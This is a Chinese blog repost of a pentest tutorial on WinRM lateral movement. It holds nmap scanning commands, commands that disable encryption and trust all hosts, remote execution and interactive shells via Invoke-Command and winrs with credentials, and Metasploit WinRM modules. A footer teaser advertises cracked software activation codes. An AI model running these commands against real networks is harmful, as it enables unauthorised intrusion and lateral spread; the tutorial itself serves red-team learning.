1. 全栈程序员必看首页

WinRM横向移动

全栈程序员-站长 未分类 阅读 4

WinRM横向移动https blog csdn net SheXinK article details

目录

讲在前面

探测服务

Powershell执行

CMD执行

讲在前面

横向渗透过程中工具非常多,在笔者所接触朋友圈来看大部分习惯使用impacket工具集或PsTools工具集等,笔者本文介绍利用WinRM服务进行横向移动,当然我们也可以利用impacket进行哈希传递来执行winrm服务,使用此服务结合其他工具或漏洞进行组合拳,事半功倍

注意:

winrm服务访问需要特殊权限且知悉账号密码,此处笔者利用域管理员权限进行实验。

扫描端口

nmap -p 5985,5986 -sV 指定IP

WinRM横向移动

启动WinRM服务

winrm quickconfig winrm set winrm/config/Client @{AllowUnencrypted = "true"} Set-Item WSMan:localhost\client\trustedhosts -value * 或 Enable-PSRemoting -Force

WinRM横向移动

Powershell执行

Invoke-Command -ComputerName TARGET -ScriptBlock { dir c:\ } //命令执行 Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -command {Get-Culture} //命令执行 Invoke-Command -ComputerName TARGET -Credential 域名\用户名 -ScriptBlock {Get-Culture} //命令执行 Enter-PSSession -ComputerName 10.2.0.100 -Credential administrator //返回交互式shell

WinRM横向移动

CMD执行

winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig" winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx "ipconfig" 获取交互式shell winrs -r:http://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd winrs -r:https://10.2.0.111:5985 -u:机器名\用户名 -p:xxxxx cmd

MSF执行

exploit/windows/winrm/winrm_script_exec //WinRM代码执行模块配置 auxiliary/scanner/winrm/winrm_cmd //WinRM命令执行 auxiliary/scanner/winrm/winrm_auth_methods //WinRM Auth方法 auxiliary/scanner/winrm/winrm_login //WinRM凭证发现

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/232007.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • python编程100例_python典型异常

    python编程100例_python典型异常

    python编程100例_python典型异常异常模块下面介绍python常用的异常模块AttributeError异常AttributeError试图访问一个类中不存在的成员(包括:成员变量、属性和成员方法)而引发的异常Attribut

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月30日
    10
  • 初识lunix_centos ubuntu

    初识lunix_centos ubuntu

    初识lunix_centos ubuntuLinux常用快捷键    先安装rz指令,再使用rz进行导入文件    ls显示当前目录下的文件  ls-thal显示当前目录下的文件及详细信息  cd切换目录  mkdir新建目录  cp-r旧目录/新目录拷贝文件  rm-r目录删除文件  su账号名使用指定用户登录系统  tar压缩/解压命令    …

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月28日
    7
  • mysql数据库创建、删除数据库

    mysql数据库创建、删除数据库

    mysql数据库创建、删除数据库

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月15日
    53
  • 激活码 PhpStorm 2022.01-激活码分享2022.03.05 idea

    激活码 PhpStorm 2022.01-激活码分享2022.03.05

    (激活码 PhpStorm 2022.01)本文适用于JetBrains家族所有ide,包括IntelliJidea,phpstorm,webstorm,pycharm,datagrip等。IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/ide…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月2日
    172
  • opencv cv2.imread()「建议收藏」

    opencv cv2.imread()「建议收藏」

    opencv cv2.imread()「建议收藏」cv2.imread()用于读取图片文件imread函数有两个参数,第一个参数是图片路径,第二个参数表示读取图片的形式,有三种:cv2.IMREAD_COLOR:加载彩色图片,这个是默认参数,可以直接写1。cv2.IMREAD_GRAYSCALE:以灰度模式加载图片,可以直接写0。cv2.IMREAD_UNCHANGED:包括alpha,可以直接写-1cv2.imread()读…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月15日
    3
  • MariaDB安装Win10

    MariaDB安装Win10

    MariaDB安装Win10本次搭建mysql数据,选择了是和mysql类似的MariaDB,完全可以满足日常的使用需求,且命令和mysql没有太大的区别。对应MariaDB下载地址:https://downloads.mariadb.org/解压下载完成的文件,这里我解压到了C盘,路径:C:\mariadb-10.5.3-winx64使用win+R,输入CMD,进入DOS控制台。输入命令cdC:\mariadb-10.5.3-winx64,进入MariaDB的对应的路径中执行安装的命令mysqld.exe–..

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月10日
    96

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号